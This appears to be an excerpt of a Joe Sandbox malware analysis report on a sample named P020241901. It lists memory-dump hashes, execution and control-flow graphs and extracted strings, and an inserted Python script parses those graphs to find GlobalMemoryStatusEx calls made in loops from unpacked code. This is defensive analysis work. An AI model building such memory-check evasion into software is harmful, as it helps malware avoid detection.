                                  • Instruction ID: 8b47d595fca3e0f599fd6126d66f62c655558704f13de104bdae5e2d78de05a3
                                  • Opcode Fuzzy Hash: f16fb8c738b84faab5394b1e643fd6f45bb9889f0c241683d8cf271bc14f742d
                                  • Instruction Fuzzy Hash: C1C15FB1C817658FD719CF25E94C1A93BB1BB85314F908A09D1A16F2E2DBB4906ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1539fb1183cb6a43681823d0a6d8dad6cdc465602d98e497f1ef69d3c509b005
                                  • Instruction ID: 373bd2422ac298fd5883f4d38d4aa49cf6d194f365bc8c3af4f835dfc5f0b636
                                  • Opcode Fuzzy Hash: 1539fb1183cb6a43681823d0a6d8dad6cdc465602d98e497f1ef69d3c509b005
                                  • Instruction Fuzzy Hash: B0512D70E102198FDB14CFA9C5809AEFBF2BF89305F24D169D518AB316D7319A46CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9cd476549cdf03d33eb9773e4693c61f5bcad0ea259827911da68de24662a09e
                                  • Instruction ID: 7d81ce9d457f6fc768f379239e996a190c7ab1efd25fbe921070e42eba99b1e1
                                  • Opcode Fuzzy Hash: 9cd476549cdf03d33eb9773e4693c61f5bcad0ea259827911da68de24662a09e
                                  • Instruction Fuzzy Hash: 7BC08025E8F348CFD74049C864084F5F37CDB87126F443073C50FE3306D220401581A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:13.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:25
                                  Total number of Limit Nodes:6
                                  execution_graph 27711 2800848 27713 280084e 27711->27713 27712 280091b 27713->27712 27715 2801382 27713->27715 27717 2801396 27715->27717 27716 2801484 27716->27713 27717->27716 27719 2807090 27717->27719 27720 280709a 27719->27720 27721 28070b4 27720->27721 27725 5ccd388 27720->27725 27730 5ccd383 27720->27730 27735 5ccd379 27720->27735 27721->27717 27726 5ccd39d 27725->27726 27727 5ccd5b2 27726->27727 27728 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27726->27728 27729 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27726->27729 27727->27721 27728->27726 27729->27726 27732 5ccd388 27730->27732 27731 5ccd5b2 27731->27721 27732->27731 27733 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27732->27733 27734 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27732->27734 27733->27732 27734->27732 27736 5ccd382 27735->27736 27738 5ccd39d 27735->27738 27736->27721 27737 5ccd5b2 27737->27721 27738->27737 27739 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27738->27739 27740 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27738->27740 27739->27738 27740->27738
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a14991ca884a1f9f16a76d0b8ab95f055b1cd61bf80e63a5c5cc05d4f2257663
                                  • Instruction ID: be58183e2facaeddae00cc43730d386b5be9fd9e94aa4dc6cd00880928ac7869
                                  • Opcode Fuzzy Hash: a14991ca884a1f9f16a76d0b8ab95f055b1cd61bf80e63a5c5cc05d4f2257663
                                  • Instruction Fuzzy Hash: 2B632D35D10B198ACB11EF68C8946A9F7B1FF99300F51C79AE458B7121EB70AAD4CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52eecf0210a30edeaecedf524db764654cd8a4460373482d908710129e35452e
                                  • Instruction ID: f037cf93439cb0147d218747557fc5d7eac6d4af9fc1743ae07e809acd20035c
                                  • Opcode Fuzzy Hash: 52eecf0210a30edeaecedf524db764654cd8a4460373482d908710129e35452e
                                  • Instruction Fuzzy Hash: 14332D35D107198ECB11EF68C8906ADF7B1FF99300F15C79AE448A7265EB70AAC5CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ec6711925f002634c87e7383377cacf9e2d3816145a61493735566ab414b630
                                  • Instruction ID: efb10011894e3bc661da121da9bfe278dfe8afd3fdc1b12cf972e74af73f2574
                                  • Opcode Fuzzy Hash: 8ec6711925f002634c87e7383377cacf9e2d3816145a61493735566ab414b630
                                  • Instruction Fuzzy Hash: C232A278A002058FDB54DFA8D984BADBBB6FF88710F248469E409DB3A6DB35DC41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebaf8c52281ff70039c3bb8ce1eb3a4f2e1c8a5880328462ec01472056648e22
                                  • Instruction ID: 118eb7fd7aaa29b68020c7a40f8b2026e27df046163457275531d73e8a499d2d
                                  • Opcode Fuzzy Hash: ebaf8c52281ff70039c3bb8ce1eb3a4f2e1c8a5880328462ec01472056648e22
                                  • Instruction Fuzzy Hash: 52B17C78E402098FDB50CFA9CDD17ADBBF2AF88314F148129D919E7294EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad46c8c95dadcb2ed398067a763c866dd72f82d6b8d4b51671f3c10b20fd2edf
                                  • Instruction ID: 7d618a349a2fabdc9f7a12f6e12d4864e07269b962a3df6c9e9ebf4c4ba54adb
                                  • Opcode Fuzzy Hash: ad46c8c95dadcb2ed398067a763c866dd72f82d6b8d4b51671f3c10b20fd2edf
                                  • Instruction Fuzzy Hash: F1914C78E00209DFDB90CFA9CD8579EBBF2AF88304F148129E519E7294EB749845CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 2336 2806eda-2806f42 call 2806c40 2345 2806f44-2806f5d call 2806384 2336->2345 2346 2806f5e-2806f8c 2336->2346 2350 2806f8e-2806f91 2346->2350 2352 2806f93-2806fc8 2350->2352 2353 2806fcd-2806fd0 2350->2353 2352->2353 2354 2806fd2-2806fd9 2353->2354 2355 2806fe4-2806fe7 2353->2355 2356 28070eb-28070f1 2354->2356 2357 2806fdf 2354->2357 2358 2806fe9-2806ffd 2355->2358 2359 280701a-280701d 2355->2359 2357->2355 2365 2807003 2358->2365 2366 2806fff-2807001 2358->2366 2360 280702d-280702f 2359->2360 2361 280701f 2359->2361 2363 2807031 2360->2363 2364 2807036-2807039 2360->2364 2379 280701f call 2807918 2361->2379 2380 280701f call 280790a 2361->2380 2363->2364 2364->2350 2368 280703f-280704e 2364->2368 2369 2807006-2807015 2365->2369 2366->2369 2367 2807025-2807028 2367->2360 2371 2807050-2807053 2368->2371 2372 2807078-280708e 2368->2372 2369->2359 2375 280705b-2807076 2371->2375 2372->2356 2375->2371 2375->2372 2379->2367 2380->2367
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq
                                  • API String ID: 0-348097489
                                  • Opcode ID: bba7bf172035186471a32bf4acd5f775aa0f52a7017340fa70f66c6543225184
                                  • Instruction ID: eead362c5061f2b5c2a48763209118e7687bdf42b23d2f01961d13aeac7a6129
                                  • Opcode Fuzzy Hash: bba7bf172035186471a32bf4acd5f775aa0f52a7017340fa70f66c6543225184
                                  • Instruction Fuzzy Hash: D351B334F002558FDB55CF78C9A4BAEB7B6EF85300F10856AE405EB2D1DB719846CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 2992 5cce198-5cce1a3 2993 5cce1cd-5cce1ec call 5ccd354 2992->2993 2994 5cce1a5-5cce1cc call 5ccd348 2992->2994 3000 5cce1ee-5cce1f1 2993->3000 3001 5cce1f2-5cce251 2993->3001 3008 5cce257-5cce2e4 GlobalMemoryStatusEx 3001->3008 3009 5cce253-5cce256 3001->3009 3013 5cce2ed-5cce315 3008->3013 3014 5cce2e6-5cce2ec 3008->3014 3014->3013
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3242095202.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_5cc0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83fb3e26a34f6cad6ba8f6f6d60c3d94531c33481613bb2135e5d89ab7ab2a3e
                                  • Instruction ID: af2742bbd1e68768c47519c6a173991b228ab9c9667d49ccda7c885082259849
                                  • Opcode Fuzzy Hash: 83fb3e26a34f6cad6ba8f6f6d60c3d94531c33481613bb2135e5d89ab7ab2a3e
                                  • Instruction Fuzzy Hash: F2412372E043598FCB04CFA9D8446EEBFF5AF89210F1485AAD405A7241DB789945CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 3017 5ccd354-5cce2e4 GlobalMemoryStatusEx 3020 5cce2ed-5cce315 3017->3020 3021 5cce2e6-5cce2ec 3017->3021 3021->3020
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05CCE1EA), ref: 05CCE2D7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3242095202.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_5cc0000_P020241901.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: a71ee67b1ada717ab24e0394f61bffff32f2adb9a68634d3d7d4d0dfb8cb1362
                                  • Instruction ID: 10093c199eddbea67f644d6a490faf54508da13c214cfbb3b2e03fa11cbbc41a
                                  • Opcode Fuzzy Hash: a71ee67b1ada717ab24e0394f61bffff32f2adb9a68634d3d7d4d0dfb8cb1362
                                  • Instruction Fuzzy Hash: 361103B1C006599BCB10DF9AD544BAEFBF8EF49310F10856AE918B7240D378A944CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%
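The execution_graph and control_flow_graph lines above are flattened renderings of graph images: each decimal node id is followed by its address (or basic-block range), optional "call <addr>" annotations and the API names the node invokes, and "a->b" tokens are edges. The following added example (not part of the report or of Joe Sandbox) parses that stream and reports which API-calling nodes sit on a cycle. Applied to the execution graph above, copied verbatim into the code, it shows GlobalMemoryStatusEx invoked from nodes 5ccd5d8 and 5ccd5d3, each in a loop with its parent, inside the 05CC0000 region that the report dumps as not based on a PE; GlobalMemoryStatusEx reports total and available physical memory, so repeated calls from unpacked code are a point worth examining in that dump. The token grammar is inferred from the dumps on this page, not documented by the tool.

```python
"""Parse Joe Sandbox's flattened execution_graph / control_flow_graph lines and
find API-calling nodes that execute inside loops.

Added example. Grammar inferred from this report: "<id> <address>" opens a node,
"call <addr>" and bare API names attach to the current node, "a->b" is an edge.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Node:
    node_id: int
    address: str                                 # "5ccd388" or a range "2806eda-2806f42"
    calls: List[str] = field(default_factory=list)  # targets of "call <addr>"
    apis: List[str] = field(default_factory=list)   # imported API names on this node


@dataclass
class Graph:
    kind: str                                    # "execution_graph" or "control_flow_graph"
    nodes: Dict[int, Node]
    edges: List[Tuple[int, int]]

    def successors(self, nid: int) -> List[int]:
        return [b for a, b in self.edges if a == nid]


def parse_graph(line: str) -> Graph:
    tokens = line.split()
    graph = Graph(kind=tokens[0], nodes={}, edges=[])
    cur = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                          # edge between two node ids
            src, dst = tok.split("->")
            graph.edges.append((int(src), int(dst)))
        elif tok.isdigit():                      # new node: id, then its address token
            cur = Node(int(tok), tokens[i + 1])
            graph.nodes[cur.node_id] = cur
            i += 1
        elif cur is None:
            raise ValueError(f"annotation {tok!r} before any node")
        elif tok == "call":                      # "call <addr>" annotation
            cur.calls.append(tokens[i + 1])
            i += 1
        else:                                    # API name invoked by this node
            cur.apis.append(tok)
        i += 1
    return graph


def api_call_sites(graph: Graph) -> Dict[str, List[str]]:
    """API name -> sorted, de-duplicated addresses of the nodes calling it."""
    sites: Dict[str, set] = {}
    for node in graph.nodes.values():
        for api in node.apis:
            sites.setdefault(api, set()).add(node.address)
    return {api: sorted(addrs) for api, addrs in sites.items()}


def in_loop(graph: Graph, nid: int) -> bool:
    """True if nid can reach itself, i.e. the node executes repeatedly."""
    seen, stack = set(), list(graph.successors(nid))
    while stack:
        n = stack.pop()
        if n == nid:
            return True
        if n not in seen:
            seen.add(n)
            stack.extend(graph.successors(n))
    return False


def looping_api_sites(graph: Graph) -> Dict[str, List[str]]:
    """Subset of api_call_sites() whose nodes lie on a cycle."""
    sites: Dict[str, set] = {}
    for node in graph.nodes.values():
        if node.apis and in_loop(graph, node.node_id):
            for api in node.apis:
                sites.setdefault(api, set()).add(node.address)
    return {api: sorted(addrs) for api, addrs in sites.items()}


# Copied verbatim from this report: the execution graph of process 9.
EXECUTION_GRAPH = (
    "execution_graph 27711 2800848 27713 280084e 27711->27713 27712 280091b "
    "27713->27712 27715 2801382 27713->27715 27717 2801396 27715->27717 "
    "27716 2801484 27716->27713 27717->27716 27719 2807090 27717->27719 "
    "27720 280709a 27719->27720 27721 28070b4 27720->27721 27725 5ccd388 "
    "27720->27725 27730 5ccd383 27720->27730 27735 5ccd379 27720->27735 "
    "27721->27717 27726 5ccd39d 27725->27726 27727 5ccd5b2 27726->27727 "
    "27728 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx "
    "27726->27728 27729 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx "
    "GlobalMemoryStatusEx 27726->27729 27727->27721 27728->27726 27729->27726 "
    "27732 5ccd388 27730->27732 27731 5ccd5b2 27731->27721 27732->27731 "
    "27733 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx "
    "27732->27733 27734 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx "
    "GlobalMemoryStatusEx 27732->27734 27733->27732 27734->27732 27736 5ccd382 "
    "27735->27736 27738 5ccd39d 27735->27738 27736->27721 27737 5ccd5b2 "
    "27737->27721 27738->27737 27739 5ccd5d8 GlobalMemoryStatusEx "
    "GlobalMemoryStatusEx GlobalMemoryStatusEx 27738->27739 27740 5ccd5d3 "
    "GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27738->27740 "
    "27739->27738 27740->27738"
)
# Copied verbatim from this report: the small control-flow graph at 5ccd354.
CFG_FRAGMENT = (
    "control_flow_graph 3017 5ccd354-5cce2e4 GlobalMemoryStatusEx 3020 5cce2ed-5cce315 "
    "3017->3020 3021 5cce2e6-5cce2ec 3017->3021 3021->3020"
)

if __name__ == "__main__":
    for raw in (EXECUTION_GRAPH, CFG_FRAGMENT):
        g = parse_graph(raw)
        print(f"{g.kind}: {len(g.nodes)} nodes, {len(g.edges)} edges")
        print("  API call sites:", api_call_sites(g))
        print("  API call sites inside loops:", looping_api_sites(g))
```

The execution graph yields 25 nodes, matching the "Total number of Nodes" figure above, and every GlobalMemoryStatusEx node is reported as looping; the isolated control-flow fragment has the same API but no cycle, which is why the loop check is run on the execution graph rather than on a single function's CFG.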

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: f706946d8d33406b50db126925c06b1771e0f95bae765c5ceb682f762397c453
                                  • Instruction ID: bfb4ca9be8d2712d959880498c2a25321bc7c9a12b724cf8f98536717e21449c
                                  • Opcode Fuzzy Hash: f706946d8d33406b50db126925c06b1771e0f95bae765c5ceb682f762397c453
                                  • Instruction Fuzzy Hash: F2310138B002418FDB659B34D99476E3BA3EF89210F148978D806DB395EF39DC4ACB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: 0988db559eced18e2e2d0369807841485b73473a18b70b02c9f6d68f2f029a87
                                  • Instruction ID: c70c2ece8b5bdae829c81b92397eb1706679503c8c37984b5caffb48e32cdb80
                                  • Opcode Fuzzy Hash: 0988db559eced18e2e2d0369807841485b73473a18b70b02c9f6d68f2f029a87
                                  • Instruction Fuzzy Hash: 5D31E138B002058FDB659B34D99476E3BA7EF89200F248978D806DB395DF35DC46CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  • Opcode ID: a4b984912bf0e1819da0393ae1517c3e0686a8152277aa4534fb73d8475ff844
                                  • Instruction ID: 5adf8fa2e203894824ff1bed1b0491b582158cb7a8e005ca7376f4fd81fe917b
                                  • Opcode Fuzzy Hash: a4b984912bf0e1819da0393ae1517c3e0686a8152277aa4534fb73d8475ff844
                                  • Instruction Fuzzy Hash: 4A317378E00219DFDB54CF64D994BAEF7B6FF85310F108629E406EB290EB71A946CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d27ee6a563614b2c5dcbc2c740dd3952b221b28f9de2d0aabe3ace529640fda5
                                  • Instruction ID: 0550931bde409ecb1407b055a585093984d641b9876163918eeae11006883fe7
                                  • Opcode Fuzzy Hash: d27ee6a563614b2c5dcbc2c740dd3952b221b28f9de2d0aabe3ace529640fda5
                                  • Instruction Fuzzy Hash: 02122E34B002118FCB69AB38E99872D76A7EB89305B60493DE405CB355CF79EC5BCB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 289109fab9e02389c3c77f0935e18353a17f3dc0c00a5c3c6d12701d6f3fb74f
                                  • Instruction ID: 503a35cd7436d853579ccbb8c4daaf798152cd1383c046f5dae0ddc2f54cbbac
                                  • Opcode Fuzzy Hash: 289109fab9e02389c3c77f0935e18353a17f3dc0c00a5c3c6d12701d6f3fb74f
                                  • Instruction Fuzzy Hash: A7122D34B002118FCB69AB38E89872D76A7EB89705B60493DE405CB355CF79EC5BCB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ad2565edea47acc95039036a3e9c4286996fdddd52b9035988fdaebaf1b87af
                                  • Instruction ID: 96b505da648ce8c84a7f971d26a70b09ea00fdb0e6b5b727cf9fd6a302a81e7d
                                  • Opcode Fuzzy Hash: 3ad2565edea47acc95039036a3e9c4286996fdddd52b9035988fdaebaf1b87af
                                  • Instruction Fuzzy Hash: 5DB17C78E402098FDB50CFA8CD917DDBBF2AF88318F148129D919E7294EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9d9014c53742e9f85b415a19be1a4abf472dff580f45fa19c0252356d623ae2
                                  • Instruction ID: 16fc72acca9de675214771d994656ee36f83b1f2c5261df197f0169d359ee566
                                  • Opcode Fuzzy Hash: f9d9014c53742e9f85b415a19be1a4abf472dff580f45fa19c0252356d623ae2
                                  • Instruction Fuzzy Hash: F0916238A001058FCB54DFA4D994AADBBF2EF88714F248469E40AE73A6DB35DC42CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 019229a2f1fc2c119e5c8e2383fdfe614d45b12b802abe50e0db9ab06192c172
                                  • Instruction ID: c0f59e832e6d8f54d46ba401eae1453ebe42f20d2ec4a2ad95de0e6d31119a88
                                  • Opcode Fuzzy Hash: 019229a2f1fc2c119e5c8e2383fdfe614d45b12b802abe50e0db9ab06192c172
                                  • Instruction Fuzzy Hash: 23A13B78E00209DFDB90CFA9C9857DDBBF2AF88314F148129E519E7294EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c740a3c3bd74bf72bbc500b87bf56bad7cc15e91d463b140437121e138d6f66c
                                  • Instruction ID: 8c126e3fc66850e9488da8ce564cfaddf3448526fa21160ab867f3d2898181ee
                                  • Opcode Fuzzy Hash: c740a3c3bd74bf72bbc500b87bf56bad7cc15e91d463b140437121e138d6f66c
                                  • Instruction Fuzzy Hash: 35718BB8E002498FDB50DFA9C98579EBBF2BF88314F148129E519E7294EB349841CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 431d45fb5866505ab88ecfc95d4be8dfe55ebd292459f7b010a8af45821d8956
                                  • Instruction ID: 0a4637e2c7d7724887123e6875ddb2e2c381c30da08f977080b908d988073694
                                  • Opcode Fuzzy Hash: 431d45fb5866505ab88ecfc95d4be8dfe55ebd292459f7b010a8af45821d8956
                                  • Instruction Fuzzy Hash: E7716BB8E002498FDB50CFA9C9857DEBBF2BF88314F148129E519E7294EB749841CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62a262cc4683724db4dc00010422f7758e3bcc5972e580c6dcc1dc1ccf2f7257
                                  • Instruction ID: 48b8bb4ad88c9bf876083ca0b652d2dbc7b9812c38925650748ff72ae345b570
                                  • Opcode Fuzzy Hash: 62a262cc4683724db4dc00010422f7758e3bcc5972e580c6dcc1dc1ccf2f7257
                                  • Instruction Fuzzy Hash: 9E512378E002288FDB54CFA9C899BDDBBB5BF48304F148119E819BB395E774A844CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f2132a18a50d7e6aff6fce6e2c2e154678287ca809de5df02f7cf1386cdd5039
                                  • Instruction ID: 7dfc75d98c56e0088e3b46a5c1d1da34ac2aee2014c2e8e937b50b3871b376a0
                                  • Opcode Fuzzy Hash: f2132a18a50d7e6aff6fce6e2c2e154678287ca809de5df02f7cf1386cdd5039
                                  • Instruction Fuzzy Hash: 17510378D003288FDB54DFA9C889B9DBBB5BF48314F148119E819BB3A4E774A844CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb349edab02114c45ea38deb843142fb178ad60d4f7baa4f2340dc87905e8435
                                  • Instruction ID: e5c040baafcb8e6eebd02ea30a60d878bcde0aab3b9fcfe415f788ceb39f08c0
                                  • Opcode Fuzzy Hash: fb349edab02114c45ea38deb843142fb178ad60d4f7baa4f2340dc87905e8435
                                  • Instruction Fuzzy Hash: 6D51A8316952458FCB0EEF78F988B593B76FB52308304996AD1044B27EDE60795BCB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Opcode Fuzzy Hash: fea1d43e42189c136875ba0eac20b41cdd1940f6d014ff9cd4bfd99c0fb5f9d7
                                  • Instruction Fuzzy Hash: 06E068367881E0CFC7019B3CA8D409ABFB9DFC622530C01DFD089C7282C6228855CBC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage: 12.1%
                                  Dynamic/Decrypted Code Coverage: 100%
                                  Signature Coverage: 0%
                                  Total number of Nodes: 365
                                  Total number of Limit Nodes: 20
